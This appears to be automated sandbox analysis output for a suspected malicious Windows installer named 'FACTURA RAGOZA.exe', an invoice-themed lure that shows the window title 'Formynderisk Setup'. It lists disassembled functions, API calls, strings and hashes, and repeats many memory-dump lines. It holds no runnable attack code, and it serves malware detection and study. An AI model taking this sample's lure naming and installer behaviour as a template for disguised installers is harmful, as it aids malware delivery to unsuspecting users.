Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
Opcode Fuzzy Hash: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A

Function 004064CB Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14

Function 00406CA2 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94

Function 0040405D Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
GetSysColor.USER32(?), ref: 0040412B
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
lstrlenA.KERNEL32(?), ref: 0040414C
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
GetDlgItem.USER32(?,0000040A), ref: 004041D2
SendMessageA.USER32(00000000), ref: 004041D5
GetDlgItem.USER32(?,000003E8), ref: 00404200
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
SetCursor.USER32(00000000), ref: 00404258
ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
LoadCursorA.USER32(00000000,00007F00), ref: 00404278
SetCursor.USER32(00000000), ref: 0040427B
SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB

Strings

Space required: , xrefs: 0040422B
vs, xrefs: 0040407D
N, xrefs: 004041EE
open, xrefs: 00404263
(@@, xrefs: 00404260

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: (@@$N$Space required: $open$vs
API String ID: 3615053054-2936858270
Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Formynderisk Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Formynderisk Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Formynderisk Setup
API String ID: 941294808-2688107740
Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5

Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4

Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949

GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
wsprintfA.USER32 ref: 00405AEF
GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
GlobalFree.KERNEL32(00000000), ref: 00405BD8
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF

Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA RAGOZA.exe,80000000,00000003), ref: 004059A6
Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

Strings

NUL, xrefs: 00405A81
%s=%s, xrefs: 00405AE5
[Rename], xrefs: 00405B59, 00405B6B

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD

Function 00402B7F Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
MulDiv.KERNEL32(000D21E2,00000064,000D21E6), ref: 00402BC5
wsprintfA.USER32 ref: 00402BD5
SetWindowTextA.USER32(?,?), ref: 00402BE5
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7

Strings

verifying installer: %d%%, xrefs: 00402BCF
!, xrefs: 00402BB0
!, xrefs: 00402BB6

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%$!$!
API String ID: 1451636040-2786031645
Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59

Function 00405F9A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA RAGOZA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
CharNextA.USER32(?,"C:\Users\user\Desktop\FACTURA RAGOZA.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014

Strings

*?|<>/":, xrefs: 00405FE2
"C:\Users\user\Desktop\FACTURA RAGOZA.exe", xrefs: 00405FD6
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\FACTURA RAGOZA.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1873282296
Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D

Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F98
GetSysColor.USER32(00000000), ref: 00403FB4
SetTextColor.GDI32(?,00000000), ref: 00403FC0
SetBkMode.GDI32(?,?), ref: 00403FCC
GetSysColor.USER32(?), ref: 00403FDF
SetBkColor.GDI32(?,?), ref: 00403FEF
DeleteObject.GDI32(?), ref: 00404009
CreateBrushIndirect.GDI32(?), ref: 00404013

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55

Function 00404F48 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8

Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
GetMessagePos.USER32 ref: 00404836
ScreenToClient.USER32(?,?), ref: 00404850
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888

Strings

f, xrefs: 00404864

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9

Function 00403974 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Formynderisk Setup), ref: 00403A0C

Strings

1033, xrefs: 00403978, 00403982, 004039F3
"C:\Users\user\Desktop\FACTURA RAGOZA.exe", xrefs: 00403975
